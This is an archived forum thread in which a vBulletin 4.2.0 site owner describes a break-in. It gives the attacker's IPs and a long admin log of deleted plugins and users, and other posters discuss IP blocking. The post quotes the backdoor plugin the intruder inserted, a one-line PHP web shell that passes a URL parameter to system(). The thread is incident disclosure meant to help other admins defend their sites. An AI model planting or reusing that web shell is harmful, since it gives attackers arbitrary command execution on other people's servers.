The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
v4.2.0 hacker details
This script kiddy can't handle his hormones and has gone on a rampage.
https://www.google.co.uk/#q=%22ma3kesi%22 Most of the forums are running 4.2.0 (some patch 3). Several hundred (including mine) are showing that username indexed in google in the past week. IP address found in my adminlog table, you can search them yourself, from Indonesia/Burma. 203.81.72.83 101.255.62.233 email (I think not real, they didn't need a real email once inside): ma3kesi@mm.com Block these IPs, they are frequently used for all types of attacks (even on Gmail and facebook). What they did. From the adminlog (descending, so first actions at the bottom.: Column headers: `adminlogid`, `userid`, `dateline`, `script`, `action`, `extrainfo`, `ipaddress` Code:
7627, 1920, 1379801626, 'user.php', 'modify', '', '203.81.72.83'), (7626, 1920, 1379801594, 'user.php', 'find', '', '203.81.72.83'), (7625, 1920, 1379801583, 'user.php', 'find', '', '203.81.72.83'), (7624, 1920, 1379801578, 'user.php', 'modify', '', '203.81.72.83'), (7623, 1920, 1379801565, 'user.php', 'add', '', '203.81.72.83'), (7622, 1920, 1379801447, 'plugin.php', '', '', '203.81.72.83'), (7621, 1920, 1379801445, 'plugin.php', 'kill', 'plugin id = 40', '203.81.72.83'), (7620, 1920, 1379801443, 'plugin.php', 'delete', 'plugin id = 40', '203.81.72.83'), (7619, 1920, 1379801438, 'plugin.php', '', '', '203.81.72.83'), (7618, 1920, 1379801436, 'plugin.php', 'kill', 'plugin id = 42', '203.81.72.83'), (7617, 1920, 1379801434, 'plugin.php', 'delete', 'plugin id = 42', '203.81.72.83'), (7616, 1920, 1379801428, 'plugin.php', '', '', '203.81.72.83'), (7615, 1920, 1379801426, 'plugin.php', 'kill', 'plugin id = 41', '203.81.72.83'), (7614, 1920, 1379801424, 'plugin.php', 'delete', 'plugin id = 41', '203.81.72.83'), (7613, 1920, 1379801410, 'plugin.php', 'modify', '', '203.81.72.83'), (7612, 1920, 1379801373, 'options.php', 'options', '', '203.81.72.83'), (7611, 1920, 1379801371, 'options.php', 'dooptions', '', '203.81.72.83'), (7610, 1920, 1379801359, 'options.php', 'options', '', '203.81.72.83'), (7609, 1920, 1379801279, 'options.php', 'options', '', '203.81.72.83'), (7608, 1920, 1379801226, 'options.php', 'options', '', '203.81.72.83'), (7607, 1920, 1379801224, 'options.php', 'dooptions', '', '203.81.72.83'), (7606, 1920, 1379801181, 'options.php', 'options', '', '203.81.72.83'), (7605, 1920, 1379801180, 'options.php', 'dooptions', '', '203.81.72.83'), (7604, 1920, 1379801144, 'options.php', 'options', '', '203.81.72.83'), (7603, 1920, 1379801125, 'options.php', '', '', '203.81.72.83'), (7602, 1920, 1379801038, 'user.php', 'pruneusers', '', '203.81.72.83'), (7601, 1920, 1379801023, 'user.php', 'modify', '', '203.81.72.83'), (7600, 1920, 1379801021, 'user.php', 'kill', 'user id = 1919', '203.81.72.83'), (7599, 1920, 1379801016, 'user.php', 'remove', 'user id = 1919', '203.81.72.83'), (7598, 1920, 1379801011, 'user.php', 'edit', 'user id = 1919', '203.81.72.83'), (7597, 1920, 1379801005, 'user.php', 'pruneusers', '', '203.81.72.83'), (7596, 1920, 1379800998, 'user.php', 'modify', '', '203.81.72.83'), (7595, 1920, 1379800996, 'user.php', 'kill', 'user id = 1', '203.81.72.83'), (7594, 1920, 1379800993, 'user.php', 'remove', 'user id = 1', '203.81.72.83'), (7593, 1920, 1379800978, 'user.php', 'edit', 'user id = 1', '203.81.72.83'), (7592, 1920, 1379800969, 'user.php', 'dopruneusers', '', '203.81.72.83'), (7591, 1920, 1379800891, 'user.php', 'pruneusers', '', '203.81.72.83'), (7590, 1920, 1379800870, 'user.php', 'find', '', '203.81.72.83'), (7589, 1920, 1379800860, 'user.php', 'modify', 'user id = 1', '203.81.72.83'), (7588, 1920, 1379800858, 'user.php', 'update', 'user id = 1', '203.81.72.83'), (7587, 1920, 1379800838, 'user.php', 'edit', 'user id = 1', '203.81.72.83'), (7586, 1920, 1379800807, 'user.php', 'pruneusers', '', '203.81.72.83'), (7585, 1920, 1379800798, 'user.php', 'prune', '', '203.81.72.83'), (7584, 1920, 1379800796, 'user.php', 'pruneusers', '', '203.81.72.83'), (7583, 1920, 1379800786, 'user.php', 'prune', '', '203.81.72.83'), (7582, 1920, 1379800784, 'user.php', 'dodeleteusers', '', '203.81.72.83'), (7581, 1920, 1379800783, 'user.php', 'dodeleteusers', '', '203.81.72.83'), (7580, 1920, 1379800781, 'user.php', 'dodeleteusers', '', '203.81.72.83'), (7579, 1920, 1379800779, 'user.php', 'dodeleteusers', '', '203.81.72.83'), (7578, 1920, 1379800777, 'user.php', 'dodeleteusers', '', '203.81.72.83'), (7577, 1920, 1379800775, 'user.php', 'dodeleteusers', '', '203.81.72.83'), (7576, 1920, 1379800773, 'user.php', 'dopruneusers', '', '203.81.72.83'), (7575, 1920, 1379800628, 'user.php', 'pruneusers', '', '203.81.72.83'), (7574, 1920, 1379800602, 'user.php', 'prune', '', '203.81.72.83'), (7573, 1920, 1379800585, 'banning.php', 'dobanuser', 'username = mikey', '203.81.72.83'), (7572, 1920, 1379800556, 'banning.php', 'banuser', '', '203.81.72.83'), (7571, 1920, 1379800485, 'plugin.php', 'updateactive', '', '203.81.72.83'), (7570, 1920, 1379800467, 'plugin.php', '', '', '203.81.72.83'), (7569, 1920, 1379800465, 'plugin.php', 'kill', 'plugin id = 18', '203.81.72.83'), (7568, 1920, 1379800462, 'plugin.php', 'delete', 'plugin id = 18', '203.81.72.83'), (7567, 1920, 1379800445, 'plugin.php', '', '', '203.81.72.83'), (7566, 1920, 1379800443, 'plugin.php', 'kill', 'plugin id = 17', '203.81.72.83'), (7565, 1920, 1379800441, 'plugin.php', 'delete', 'plugin id = 17', '203.81.72.83'), (7564, 1920, 1379800421, 'plugin.php', '', '', '203.81.72.83'), (7563, 1920, 1379800420, 'plugin.php', 'kill', 'plugin id = 51', '203.81.72.83'), (7562, 1920, 1379800416, 'plugin.php', 'delete', 'plugin id = 51', '203.81.72.83'), (7561, 1920, 1379800412, 'plugin.php', 'modify', '', '203.81.72.83'), (7560, 1920, 1379800376, 'navigation.php', 'list', 'navid = 0, tabid = 2', '203.81.72.83'), (7559, 1920, 1379800371, 'navigation.php', 'update', 'navid = 0, tabid = 2', '203.81.72.83'), (7558, 1920, 1379800363, 'navigation.php', 'list', 'navid = 0, tabid = 2', '203.81.72.83'), (7557, 1920, 1379800361, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'), (7556, 1920, 1379800359, 'navigation.php', 'default', 'navid = 2, tabid = 0', '203.81.72.83'), (7555, 1920, 1379800351, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'), (7554, 1920, 1379800349, 'navigation.php', 'update', 'navid = 0, tabid = 1', '203.81.72.83'), (7553, 1920, 1379800343, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'), (7552, 1920, 1379800341, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'), (7551, 1920, 1379800338, 'navigation.php', 'default', 'navid = 75, tabid = 0', '203.81.72.83'), (7550, 1920, 1379800283, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'), (7549, 1920, 1379800281, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'), (7548, 1920, 1379800278, 'navigation.php', 'default', 'navid = 1, tabid = 0', '203.81.72.83'), (7547, 1920, 1379800273, 'navigation.php', 'list', 'navid = 0, tabid = 0', '203.81.72.83'), (7546, 1920, 1379800181, 'template.php', 'updatetemplate', 'style id = 3', '203.81.72.83'), (7545, 1920, 1379800170, 'template.php', 'edit', 'style id = 0', '203.81.72.83'), (7544, 1920, 1379800166, 'template.php', 'modify', '', '203.81.72.83'), (7543, 1920, 1379800156, 'template.php', 'modify', '', '203.81.72.83'), (7542, 1920, 1379800151, 'template.php', 'modify', '', '203.81.72.83'), (7541, 1920, 1379800099, 'plugin.php', '', '', '203.81.72.83'), (7540, 1920, 1379800091, 'plugin.php', 'update', '', '203.81.72.83'), (7539, 1920, 1379800067, 'plugin.php', 'add', '', '203.81.72.83'), (7531, 1919, 1379796618, 'plugin.php', 'updateactive', '', '101.255.62.233'), (7530, 1919, 1379796615, 'plugin.php', '', '', '101.255.62.233'), (7529, 1919, 1379796615, 'plugin.php', 'doimport', '', '101.255.62.233'), (7528, 1919, 1379796603, 'plugin.php', 'files', '', '101.255.62.233'); They inserted this plugin (it was id=52 for me): Code:
(52, 'lol', 'ajax_complete', 'if(isset($_GET[''lol''])){echo\r\n"<h1>lol</h1><pre>"; system($_GET\r\n[''lol'']);exit;}', 'vbulletin', '', 1, 5); Initially they did change the main forum.php file too, I think this was through the admincp option because there is no sign of FTP access. I'm not a server guy, maybe they got in through SSH. I also have about 550 lines of raw server log data, showing what these 2 IPs did. I'm not sure if I should post it for not though. It seems to start with admincp/zxc.php |
2 благодарности(ей) от: | ||
Max Taxable, smirkley |
#2
|
||||
|
||||
Anyway just to post the IP's by themselves?
|
#3
|
||||
|
||||
IP blocking is a near useless tool anymore, since IPs and even user agent strings are so easy to spoof. Great and informative post though, otherwise.
|
#4
|
|||
|
|||
That's why i am mostly left locked my admincp with .htaccess and allowed only my own IP. Atleast i am safe since last 8 month .. only got hacked once last year and that i recovered.
|
Thread Tools | |
Display Modes | |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|